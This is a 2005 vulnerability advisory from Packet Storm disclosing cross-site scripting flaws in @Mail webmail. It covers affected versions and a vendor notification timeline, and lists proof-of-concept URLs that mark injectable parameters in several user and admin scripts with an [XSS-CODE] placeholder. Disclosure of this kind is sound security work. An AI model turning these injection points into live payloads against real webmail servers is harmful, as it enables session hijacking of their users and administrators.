atmailXSS.txt

2005-07-28T00:00:00
ID PACKETSTORM:38947
Type packetstorm
Reporter Lostmon
Modified 2005-07-28T00:00:00

Description

                                        
                                            `#############################################  
@Mail multiple variable cross-site scripting  
vendor url:http://www.atmail.com  
Advisory:http://lostmon.blogspot.com/2005/07/  
mail-multiple-variable-cross-site.html  
vendor notify:yes exploit available: yes  
##############################################  
  
  
@Mail is a feature rich Email solution that allows users to access  
email-resources via the web or a variety of wireless devices. The  
software incorporates a complete email-server package to manage  
and host user email at your domain(s)  
  
  
@Mail contains a flaw that allows a remote cross site scripting  
attack.This flaw exists because the application does not validate  
multiple variables upon submission to multiple scripts.This could  
allow a user to create a specially crafted URL that would execute  
arbitrary code in a user's browser within the trust relationship  
between the browser and the server, leading to a loss of integrity.  
  
#############  
versions  
#############  
  
@Mail 4.03 WebMail for Windows   
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /  
  
it is also posible other versions are vulnerable.  
  
  
#################  
Timeline  
#################  
  
Discovered:2-07-2005  
vendor notify:27-07-2005  
vendor response:28-07-2005  
disclosure:28-07-2005  
  
  
##################  
Proof of comcepts  
##################  
  
For exploit this flaws, need a clientlogin and for exploiting  
all flaws in /webadmin/ need a admin login.  
  
###################  
princal.pl  
###################  
  
http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4  
  
http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]  
  
http://[victim]/printcal.pl?type=4[XSS-CODE]  
  
###################  
task.pl  
###################  
  
http://[victim]/task.pl?func=todo[XSS-CODE]  
  
###################  
compose.pl  
####################  
  
http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.  
[victim].com%3A2%2C&folder=Sent&cache=&func=reply  
&type=reply[XSS-CODE]  
  
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new  
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]  
  
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new  
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r  
  
http://[victim]/compose.pl?func=new&To=  
lala@lala.es&Cc=&Bcc=[XSS-CODE]  
  
  
http://[victim]/compose.pl?func=new&To=  
lala@lala.es&Cc=[XSS-CODE]&Bcc=  
  
http://[victim]/compose.pl?func=new&To=  
lala@lala.es[XSS-CODE]&Cc=&Bcc=  
  
###################  
webadmin/filter.pl  
###################  
  
http://[victim]/webadmin/filter.pl?func=  
viewmailrelay&Order=IPaddress[XSS-CODE]  
  
http://[victim]/webadmin/filter.pl?func=filter  
&Header=blacklist_from&Type=1[XSS-CODE]&View=1  
  
http://[victim]/webadmin/filter.pl?func=filter  
&Header=blacklist_from[XSS-CODE]&Type=1&View=1  
  
http://[victim]/webadmin/filter.pl?  
func=filter&Header=whitelist_from&Type=0&Display=1  
&Sort=value[XSS-CODE]&Type=1&View=1  
  
  
  
######################## €nd ##########################  
  
Thnx to estrella to be my ligth  
  
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`